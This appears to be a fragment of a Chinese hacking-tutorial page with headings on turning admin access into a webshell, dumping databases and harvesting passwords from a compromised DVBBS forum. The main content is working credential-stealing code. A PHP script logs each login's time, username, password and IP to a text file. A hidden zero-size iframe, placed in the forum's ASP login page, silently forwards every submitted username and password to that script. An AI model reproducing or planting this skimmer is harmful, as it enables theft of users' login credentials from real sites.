从后台到webshell的一点思路
从暴库到暴密码的一般步骤
从暴库到暴密码的一般步骤
入侵dvbbs论坛后获取全部人密码另一法
| <? //a.php $s="ceshi.txt";//密码保存为ceshi.txt $fp=@fopen($s,"a+");//打开ceshi.txt,准备写咯。 $time = time();//获取时间 (登陆者) $ip="$REMOTE_ADDR";//获取IP(登陆者) $newfp= $time."|".$user."|".$password."|".$ip."|".chr(13).chr(10);//所有数据,时间,用户,密码,IP等等分别属于newfp @fputs($fp,$newfp);//写newfp里的所有内容,@是用来屏蔽错误的! @fclose($fp);//关闭ceshi.txt这个文件! ?> |
| <iframe frameborder=0 width='00%' height=00 scrolling=no src='站点地址/a.php?user=<%=request.form("username")%>&password=<%=request.form("password")%>'></iframe> |
PHP/ASP上传漏洞探究